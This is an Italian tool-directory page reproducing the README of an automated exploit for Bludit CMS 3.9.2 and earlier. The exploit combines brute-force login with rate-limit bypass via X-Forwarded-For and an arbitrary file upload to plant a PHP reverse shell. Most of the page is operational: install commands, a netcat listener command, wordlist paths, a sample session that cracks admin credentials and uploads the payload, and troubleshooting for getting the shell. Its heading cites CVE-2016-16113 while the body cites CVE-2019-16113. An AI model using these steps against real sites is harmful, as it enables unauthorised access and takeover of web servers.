Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2016-16113-POC — cve-2016-16113 | Kitploit
Strumenti/GitHubGitHub/d3vn0mi/cve-2016-16113-poc
Attacchi alle PasswordGenerazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubd3vn0mi/cve-2016-16113-poc

CVE-2016-16113-POC

cve-2016-16113

Vedi Repository
128 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Ottieni RCE - Exploit Bludit CMS

root@kitploit:~
     _ _____             ___            _ 
  __| |___ /_   ___ __  / _ \ _ __ ___ (_)
 / _` | |_ \ \ / / '_ \| | | | '_ ` _ \| |
| (_| |___) \ V /| | | | |_| | | | | | | |
 \__,_|____/ \_/ |_| |_|\___/|_| |_| |_|_|

Uno strumento di sfruttamento automatizzato che combina CVE-2019-17240 (Bypass dell'autenticazione) e CVE-2019-16113 (Caricamento arbitrario di file) per ottenere esecuzione remota di codice su installazioni vulnerabili di Bludit CMS.

⚠️ Disclaimer legale

SOLO PER TEST DI SICUREZZA AUTORIZZATI

Questo strumento è destinato a professionisti della sicurezza che conducono test di penetrazione autorizzati e ricercatori di sicurezza che operano entro i limiti legali. L'accesso non autorizzato a sistemi informatici è illegale secondo leggi come il Computer Fraud and Abuse Act (CFAA) negli Stati Uniti e legislazioni simili in tutto il mondo.

Usando questo strumento, accetti di:

  • Testare solo sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta
  • Rispettare tutte le leggi locali, statali e federali applicabili
  • Accettare la piena responsabilità delle tue azioni

L'autore non si assume alcuna responsabilità e non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.

📋 Panoramica

Questo exploit automatizza il processo di:

  1. Verifica della disponibilità del target
  2. Bypass dell'autenticazione tramite forza bruta (sfruttando CVE-2019-17240)
  3. Caricamento di una reverse shell PHP dannosa (sfruttando CVE-2019-16113)
  4. Stabilire una connessione di reverse shell

Dettagli della vulnerabilità

  • CVE-2019-17240: Bypass dell'autenticazione tramite implementazione impropria del rate-limiting (bypassato manipolando l'header X-Forwarded-For)
  • CVE-2019-16113: Vulnerabilità di caricamento arbitrario di file che consente l'esecuzione di codice PHP dannoso

Versioni interessate: Bludit CMS versioni 3.9.2 e precedenti

🚀 Funzionalità

  • ✅ Verifica automatica della disponibilità del target
  • ✅ Bypass dell'autenticazione tramite forza bruta
  • ✅ Capacità di enumerazione degli username
  • ✅ Forza bruta combinata username + password
  • ✅ Gestione automatica dei token CSRF
  • ✅ Generazione del payload reverse shell PHP
  • ✅ Caricamento di .htaccess per uno sfruttamento migliorato
  • ✅ Verifica della connessione

📦 Requisiti

  • Python 3.6+
  • Pacchetti Python richiesti:
    • requests

🔧 Installazione

root@kitploit:~
# Clone the repository
git clone https://github.com/yourusername/get-rce.git
cd get-rce

# Install dependencies
pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.25.0

💻 Utilizzo

Utilizzo di base

root@kitploit:~
python3 get_rce.py

Lo script ti chiederà:

  1. URL del target (es. https://target.com)
  2. Indirizzo IP del tuo listener
  3. Porta del tuo listener
  4. Se forzare l'username con forza bruta
  5. Percorsi delle wordlist

Configurazione del tuo Listener

Prima di eseguire l'exploit, imposta un listener netcat:

root@kitploit:~
nc -lvnp 4444

Sostituisci 4444 con la porta scelta.

Esempio di sessione

root@kitploit:~
$ python3 get_rce.py

Enter target URL (i.e. https://target.com): http://10.10.10.191
[ ~ ] Enter listener's IP: 10.10.14.5
[ ~ ] Enter listener's port: 4444
[...] Checking if the target is live...
[ + ] The target is live! We are good to go...

[ ~ ] Should I bruteforce username? [Y/N]: N
[ ~ ] What username should I use? (leave this to use admin as username): 
[...] We are gonna default to 'admin' as username.

[ ~ ] Enter the location for password list: /usr/share/wordlists/rockyou.txt
[ * ] Tried: 123456
[ * ] Tried: password
[ * ] Tried: 12345678
...
[ + ] Creds found: admin:Password123
[ + ] Login succeed... We are good to go :)

[ + ] The payload XyZaBcDeFg.php has been uploaded...
[ + ] The payload .htaccess has been uploaded...
[...] Attempting to get a shell... @ http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php
[ + ] You should be getting a shell by now, if not open http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php

Modalità di attacco

Modalità 1: Username noto + Forza bruta sulla password

root@kitploit:~
Should I bruteforce username? [Y/N]: N
What username should I use?: admin
Enter the location for password list: /path/to/passwords.txt

Modalità 2: Forza bruta completa delle credenziali

root@kitploit:~
Should I bruteforce username? [Y/N]: Y
Enter the location for username wordlist: /path/to/usernames.txt
Enter the location for password wordlist: /path/to/passwords.txt

📝 Wordlist consigliate

  • SecLists: https://github.com/danielmiessler/SecLists
    • Usernames: SecLists/Usernames/Names/names.txt
    • Passwords: SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt
  • RockYou: /usr/share/wordlists/rockyou.txt (Kali Linux)

🔍 Come funziona

  1. Validazione del target: Verifica se il target è raggiungibile
  2. Bypass dell'autenticazione:
    • Manipola l'header X-Forwarded-For per bypassare il rate limiting
    • Forza bruta le credenziali usando le wordlist fornite
    • Gestisce automaticamente i token CSRF
  3. Sfruttamento:
    • Carica la reverse shell PHP in /bl-content/tmp/
    • Carica il file .htaccess per garantire l'esecuzione
    • Attiva il payload per stabilire la reverse shell
  4. Accesso alla shell: Si riconnette al tuo listener

🛡️ Misure difensive

Se sei un amministratore di sistema:

  • Aggiorna immediatamente a Bludit 3.9.3 o successivo
  • Implementa un corretto rate limiting basato sulla sessione, non sull'IP
  • Valida tutti i caricamenti di file (tipo, estensione, contenuto)
  • Usa Web Application Firewall (WAF)
  • Monitora la directory /bl-content/tmp/ per file sospetti
  • Implementa politiche di password robuste
  • Abilita meccanismi di blocco dell'account

🐛 Risoluzione dei problemi

Problema: "Il target sembra essere offline"

  • Verifica che l'URL sia corretto e includa il protocollo (http/https)
  • Controlla la tua connettività di rete
  • Assicurati che il target stia effettivamente eseguendo Bludit

Problema: "Accesso fallito"

  • Verifica che le credenziali siano corrette
  • Prova una wordlist più completa
  • Verifica se il target ha meccanismi di autenticazione aggiuntivi

Problema: "Nessuna shell ricevuta"

  • Verifica che il tuo listener sia in esecuzione
  • Controlla le regole del firewall su entrambi i lati
  • Assicurati che l'IP e la porta del listener siano corretti e raggiungibili

🔗 Riferimenti

  • Dettagli CVE-2019-17240
  • Dettagli CVE-2019-16113
  • Sito ufficiale di Bludit

👤 Autore

d3vn0mi

📄 Licenza

Questo progetto è fornito solo per scopi educativi e di test di sicurezza autorizzati. Vedi il disclaimer all'inizio di questo README.

🤝 Contributi

Contributi, segnalazioni e richieste di funzionalità sono benvenuti! Sentiti libero di controllare la pagina delle issues.

⭐ Riconoscimenti

  • La comunità di ricerca sulla sicurezza per aver scoperto e documentato queste vulnerabilità
  • Il team di Bludit per la loro rapida risposta nel correggere questi problemi
Scarica lo strumento